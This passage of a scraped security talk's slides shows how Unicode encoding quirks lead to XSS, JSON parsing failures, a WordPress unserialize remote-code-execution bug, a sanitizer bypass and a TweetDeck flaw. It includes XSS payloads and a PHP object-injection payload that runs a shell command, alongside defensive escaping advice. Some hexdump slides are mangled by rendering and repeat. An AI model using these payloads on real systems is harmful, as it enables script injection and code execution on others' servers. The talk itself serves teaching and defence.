    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
    (U+3C73 CJK UNIFIED
    IDEOGRAPH-3C73)

    View Slide

  120. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>. alert|<br/>000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
    捲 (U+6372 CJK UNIFIED IDEOGRAPH-6372)

    View Slide

  121. $ curl -sL http://mths.be/brk | hexdump -C | tail -n 19
    000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .|
    000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .|
    000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.|
    000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.|
    00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.|
    00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.|
    00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.|
    00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .|
    00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .|
    00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.|
    00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.|
    00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...|
    00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.|
    00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert|
    000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script|
    000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.|
    000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.|
    000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....|
    000003e0
    (U+6970 CJK UNIFIED
    IDEOGRAPH-6970)

    View Slide

  122. http://mths.be/brm

    View Slide

  123. http://mths.be/brm
    ∀㸀㰀script㸀alert(1)㰀/script㸀

    View Slide

  125. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c

    View Slide

  127. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    ∀ (U+2200 FOR ALL)

    View Slide

  128. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    㸀 (U+3E00 CJK UNIFIED IDEOGRAPH-3E00)

    View Slide

  129. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    㰀 (U+3C00 CJK UNIFIED IDEOGRAPH-3C00)

    View Slide

  130. $ hexdump -C utf-32-xss.html
    00000000 00 00 22 00 00 00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s|
    00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p|
    00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l|
    00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(|
    00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../|
    00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i|
    00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.|
    0000006c
    s (U+0073 LATIN SMALL
    LETTER S)

    View Slide
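
The annotated hexdumps above can be reproduced in a few lines of JavaScript. This is only an illustrative sketch, not code from the talk: it decodes the bytes of `utf-32-xss.html` once as UTF-32BE and once the way a lenient ASCII-compatible consumer that skips NUL bytes might read them. That NUL-skipping consumer is an assumption made for the demonstration, and the helper names `decodeUtf32BE` and `decodeSkippingNul` are hypothetical.

```javascript
// Bytes copied from the hexdump of utf-32-xss.html, grouped per 32-bit unit.
const hex =
  '00002200 00003e00 00003c00 00000073 00000063 00000072 00000069 00000070 ' +
  '00000074 00003e00 00000061 0000006c 00000065 00000072 00000074 00000028 ' +
  '00000031 00000029 00003c00 0000002f 00000073 00000063 00000072 00000069 ' +
  '00000070 00000074 00003e00';

const bytes = Uint8Array.from(
  hex.replace(/\s+/g, '').match(/../g),
  (pair) => parseInt(pair, 16)
);

// Reads every group of four bytes as one big-endian code point.
function decodeUtf32BE(input) {
  const view = new DataView(input.buffer, input.byteOffset, input.byteLength);
  let output = '';
  for (let i = 0; i + 4 <= input.length; i += 4) {
    output += String.fromCodePoint(view.getUint32(i, false));
  }
  return output;
}

// Assumption: a consumer that treats the data as ASCII and drops NUL bytes.
function decodeSkippingNul(input) {
  return String.fromCharCode(...input.filter((byte) => byte !== 0));
}

const asUtf32 = decodeUtf32BE(bytes);
const asAscii = decodeSkippingNul(bytes);

console.log(asUtf32); // harmless-looking text: U+2200, two CJK ideographs, "script", ...
console.log(asAscii); // the same bytes, now reading as markup
```

The point of the comparison is that the same byte sequence is inert text under one interpretation and a script element under another, so the encoding has to be fixed before any filtering happens.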

  131. View Slide

  132. View Slide

  133. http://mths.be/brl

    View Slide

  134. http://mths.be/brl
    OBAMA vs. ᴼᴮᴬᴹᴬ

    View Slide

  135. JavaScript vs. JSON

    View Slide

  136. <script>
    // <?php echo strip($userInput); ?>
    </script>

    <?php /* Note:
    `strip()` strips ASCII newlines and `</script>` */
    ?>

    View Slide

  137. http://mths.be/brn

    View Slide

  139. <script>
    // <?php echo strip($userInput); ?>
    </script>
    foo[U+2028]alert('XSS')

    View Slide

  141. JSON ∉ JavaScript

    View Slide

  142. var data = '"Hello\u2028"';
    // JSON-formatted data containing a string
    // containing an (unescaped!) Line Separator

    eval('(' + data + ')');
    // → SyntaxError: Unexpected token ILLEGAL

    JSON.parse(data);
    // → 'Hello\u2028'

    View Slide

  143. Always escape JSON-formatted data
    before passing it to a JavaScript parser.
    http://mths.be/jsesc

    View Slide

  144. http://mths.be/jsesc

    View Slide

  145. var data = 'foo\u2028';

    var serialized = JSON.stringify(data);
    // → '"foo\u2028"' (contains the raw, unescaped
    // Unicode symbol)

    var escaped = jsesc(data, { 'json': true });
    // → '"foo\\u2028"' (contains an escape sequence
    // for the Unicode symbol → safer)

    JSON.parse(serialized) == JSON.parse(escaped);
    // → true (both strings unserialize to the same value)
    http://mths.be/jsesc

    View Slide
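
For readers without jsesc at hand, the same idea can be sketched in plain JavaScript. This is a minimal illustration, not the library's implementation: the helper `escapeLineTerminators` is a hypothetical name, and it only handles U+2028 and U+2029, the two symbols that are valid raw in JSON strings but were line terminators in JavaScript source at the time of this talk.

```javascript
// Hypothetical helper: rewrites raw U+2028 / U+2029 in JSON text as \uXXXX
// escape sequences, so the text is also safe to hand to a JavaScript parser.
function escapeLineTerminators(jsonText) {
  return jsonText.replace(/[\u2028\u2029]/g, (symbol) =>
    '\\u' + symbol.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

const data = 'foo\u2028';

// JSON.stringify leaves the Line Separator unescaped.
const serialized = JSON.stringify(data);

// After escaping, the JSON text contains only the six-character sequence.
const escaped = escapeLineTerminators(serialized);

console.log(serialized.includes('\u2028')); // raw symbol still present
console.log(escaped.includes('\u2028'));    // raw symbol gone
console.log(JSON.parse(escaped) === data);  // the decoded value is unchanged
```

Because the escape sequence is valid JSON as well, the escaped text can be used everywhere the unescaped text could.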

  148. var string = String.fromCharCode(0xD800);
    // a string containing an (unescaped!)
    // lone surrogate

    var data = JSON.stringify(string);
    // the same string as JSON-formatted data

    storeInDatabaseAsUtf8(data);
    // → error/crash

    sendOverWebSocketConnection(data);
    // → error/crash/DoS

    View Slide

  149. Always escape JSON-formatted data
    before passing it to a UTF-8 encoder.
    http://mths.be/jsesc

    View Slide

  150. http://mths.be/jsesc

    View Slide

  151. var data = 'foo\uD800';

    var serialized = JSON.stringify(data);
    // → '"foo\uD800"' (contains the raw, unescaped
    // Unicode symbol)

    var escaped = jsesc(data, { 'json': true });
    // → '"foo\\uD800"' (contains an escape sequence
    // for the Unicode symbol → safer)

    JSON.parse(serialized) == JSON.parse(escaped);
    // → true (both strings unserialize to the same value)
    http://mths.be/jsesc

    View Slide
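
The lone-surrogate case can be handled with a similar sketch. Again this is only an illustration under stated assumptions, not jsesc's code: `escapeLoneSurrogates` is a hypothetical helper that replaces any surrogate code unit lacking a matching partner with a `\uXXXX` escape sequence, so that the result contains no ill-formed UTF-16 before it reaches a UTF-8 encoder.

```javascript
// Matches a high surrogate not followed by a low surrogate,
// or a low surrogate not preceded by a high surrogate.
const loneSurrogate =
  /[\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?<![\uD800-\uDBFF])[\uDC00-\uDFFF]/g;

// Hypothetical helper: escapes lone surrogates, leaves valid pairs alone.
function escapeLoneSurrogates(text) {
  return text.replace(loneSurrogate, (unit) =>
    '\\u' + unit.charCodeAt(0).toString(16).padStart(4, '0')
  );
}

const loneHigh = escapeLoneSurrogates('foo\uD800');
const loneLow = escapeLoneSurrogates('\uDCA9bar');
const validPair = escapeLoneSurrogates('\uD83D\uDCA9');

console.log(loneHigh);                       // escape sequence instead of the raw code unit
console.log(loneLow);
console.log(validPair === '\uD83D\uDCA9');   // well-formed pairs pass through untouched
```

A quick way to see why this matters: `encodeURIComponent`, which has to produce UTF-8, throws a `URIError` when given a lone surrogate.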

  154. Phabricator

    View Slide

  156. View Slide

  157. View Slide

  158. View Slide

  159. uses MySQL

    View Slide

  160. uses MySQL’s ✌️utf8✌️

    View Slide

  161. View Slide

  162. View Slide

  163. http://mths.be/bro

    View Slide

  164. RCE in WordPress < 3.6.1
    http://mths.be/brq

    View Slide

  165. CVE-2013-4338
    “wp-includes/functions.php in WordPress before 3.6.1 does
    not properly determine whether data has been serialize()d,
    which allows remote attackers to execute arbitrary code by
    triggering erroneous PHP unserialize() operations.”
    http://mths.be/brq

    View Slide

  166. function is_serialized( $data ) {
        $data = trim( $data );
        $length = strlen( $data );
        $lastc = $data[$length - 1];
        if ( ';' !== $lastc && '}' !== $lastc )
            return false;
        $token = $data[0];
        switch ( $token ) {
            case 's' :
                if ( '"' !== $data[$length - 2] ) return false;
            case 'a' : case 'O' :
                return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
            case 'b' : case 'i' : case 'd' :
                return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/",
                    $data );
        }
        return false;
    }
    http://mths.be/brq

    View Slide

  168. WordPress
    Before writing it to the database, data gets serialized
    only if it’s an array or an object, or if is_serialized($data)
    returns true (double serialization).

    After retrieving data from the database, it gets unserialized
    only if is_serialized($data) returns true.
    http://mths.be/brq

    View Slide

  169. WordPress
    Before writing it to the database, data gets serialized
    only if it’s an array or an object, or if is_serialized($data)
    returns true (double serialization).

    After retrieving data from the database, it gets unserialized
    only if is_serialized($data) returns true.
    http://mths.be/brq
    uses MySQL’s ✌️utf8✌️

    View Slide

  170. http://mths.be/brq

    View Slide

  174. class Foo {
        private $command;
        public function setCommand($command) {
            $this->command = $command;
        }
        public function __destruct() {
            if ($this->command) {
                shell_exec($this->command);
            }
        }
    }

    $object = new Foo();
    $object->setCommand('echo "pwned!" > /tmp/pwned.txt');
    $serialized = serialize($object);
    // append a supplementary (astral) symbol, e.g. U+1F4A9
    $payload = $serialized . "\xF0\x9F\x92\xA9";
    http://mths.be/brq

    View Slide
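
How the pieces fit together can be modeled in JavaScript. This is a simulation under explicit assumptions, not WordPress or MySQL code: `isSerialized` is a simplified port of the PHP function shown earlier, `storeInMysqlUtf8` is a hypothetical stand-in for a MySQL `utf8` column that silently drops everything from the first supplementary symbol onward, and the serialized string is a made-up example.

```javascript
// Simplified JavaScript port of the is_serialized() logic.
function isSerialized(data) {
  data = data.trim();
  const lastChar = data[data.length - 1];
  if (lastChar !== ';' && lastChar !== '}') return false;
  const token = data[0];
  switch (token) {
    case 's':
      if (data[data.length - 2] !== '"') return false;
      // falls through, as in the PHP original
    case 'a':
    case 'O':
      return new RegExp('^' + token + ':[0-9]+:').test(data);
    case 'b':
    case 'i':
    case 'd':
      return new RegExp('^' + token + ':[0-9.E-]+;$').test(data);
  }
  return false;
}

// Assumption: models truncation at the first symbol outside the BMP.
function storeInMysqlUtf8(text) {
  let stored = '';
  for (const symbol of text) { // for...of iterates by code point
    if (symbol.codePointAt(0) > 0xFFFF) break;
    stored += symbol;
  }
  return stored;
}

// Hypothetical serialized object; any valid serialize() output would do.
const serialized = 'O:3:"Foo":1:{s:7:"command";s:2:"id";}';
const payload = serialized + '\u{1F4A9}';

const checkedBeforeWrite = isSerialized(payload); // not detected, so not double-serialized
const stored = storeInMysqlUtf8(payload);         // astral symbol and anything after it is lost
const checkedAfterRead = isSerialized(stored);    // detected, so it would be unserialized

console.log(checkedBeforeWrite, stored === serialized, checkedAfterRead);
```

The trailing astral symbol makes the check fail on the way in and disappear on the way out, which is exactly the mismatch the payload relies on.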

  175. http://mths.be/brq

    View Slide

  176. View Slide

  177. “[The following C# code] takes a provided HTML string
    and removes any potentially dangerous XSS HTML
    tags using a whitelist approach.”
    http://mths.be/brp

    View Slide

  178. private static Regex _whitelist = new Regex(@"
        ^</?(a|b(lockquote)?|code|em|h(1|2|3)|i|li|ol|p(re)?|s(ub|up|trong|trike)?|ul)>$
        |^<(b|h)r\s?/?>$
        |^<a[^>]+>$
        |^<img[^>]+/?>$",
        RegexOptions.Singleline |
        RegexOptions.IgnorePatternWhitespace |
        RegexOptions.ExplicitCapture |
        RegexOptions.Compiled
    );
    http://mths.be/brp

    View Slide

  179. /// <summary>
    /// sanitize any potentially dangerous tags from the provided
    /// raw HTML input using a whitelist based approach, leaving
    /// the "safe" HTML tags
    /// </summary>
    public static string Sanitize(string html) {
        var tagname = "";
        Match tag;
        var tags = _tags.Matches(html);
        // iterate through all HTML tags in the input
        for (int i = tags.Count-1; i > -1; i--) {
            tag = tags[i];
            tagname = tag.Value.ToLower();
            if (!_whitelist.IsMatch(tagname)) {
                // not on our whitelist? I SAY GOOD DAY TO YOU, SIR. GOOD DAY!
                html = html.Remove(tag.Index, tag.Length);
            }
    http://mths.be/brp

    View Slide

  182. else if (tagname.StartsWith("<a")) {
                // detailed <a> tag checking
                if (!IsMatch(tagname,
                    @"<a\s
                      href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
                      (\stitle=""[^""]+"")?\s?>")) {
                    html = html.Remove(tag.Index, tag.Length);
                }
            }
            else if (tagname.StartsWith("<img")) {
                // detailed <img> tag checking
                if (!IsMatch(tagname,
                    @"<img\s
                      src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
                      (\swidth=""\d{1,3}"")?
                      (\sheight=""\d{1,3}"")?
                      (\salt=""[^""]*"")?
    http://mths.be/brp

    View Slide

  183. (\stitle=""[^""]*"")?
                      \s?/?>")) {
                    html = html.Remove(tag.Index, tag.Length);
                }
            }
        }
        return html;
    }
    http://mths.be/brp

    View Slide

  186. http://mths.be/brp
    ̊
    src="404" onerror="alert('XSS')">

    View Slide

  188. http://mths.be/brp
    ̊
    src="404" onerror="alert('XSS')">
    ̊
    src="404" onerror="alert('XSS')">

    View Slide

  189. http://mths.be/brp

    View Slide

  190. TweetDeck

    View Slide

  191. View Slide

  192. View Slide

  193. View Slide

  194. function getTweetHtml(tweet) {
        var htmlEscapedTweet = htmlEscape(tweet);
        if (containsEmoji(htmlEscapedTweet)) {
            return replaceSymbolsWithImgTags(
                AccidentallyUndoHtmlEscaping(htmlEscapedTweet)
            );
        } else {
            return htmlEscapedTweet;
        }
    }
    http://mths.be/bsq

    View Slide
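
For contrast, here is a sketch of the same pipeline without the accidental unescaping step. It is an assumption-laden illustration, not TweetDeck's code: `htmlEscape` and `replaceAstralSymbolsWithImgTags` are hypothetical helpers, the `/emoji/…png` path is invented, and only symbols outside the BMP are treated as emoji to keep the example short.

```javascript
// Hypothetical helper: escapes the characters that are significant in HTML.
function htmlEscape(text) {
  const replacements = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  };
  return text.replace(/[&<>"']/g, (symbol) => replacements[symbol]);
}

// Hypothetical helper: works on already-escaped text and only adds markup
// it generates itself, so the escaping of user input is never undone.
function replaceAstralSymbolsWithImgTags(escapedHtml) {
  return escapedHtml.replace(/[\uD800-\uDBFF][\uDC00-\uDFFF]/g, (symbol) => {
    const hex = symbol.codePointAt(0).toString(16);
    return '<img alt="' + symbol + '" src="/emoji/' + hex + '.png">';
  });
}

function getTweetHtml(tweet) {
  return replaceAstralSymbolsWithImgTags(htmlEscape(tweet));
}

const html = getTweetHtml('<script>alert(1)</script> \u{1F4A9}');
console.log(html); // user-supplied markup stays escaped; only the emoji becomes an <img>
```

The design point is the order of operations: escape once, then only ever append trusted markup to the escaped string.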

  195. Thanks!
    Questions? → @mathias

    View Slide

  196. View Slide

  197. http://mths.be/brr

    View Slide
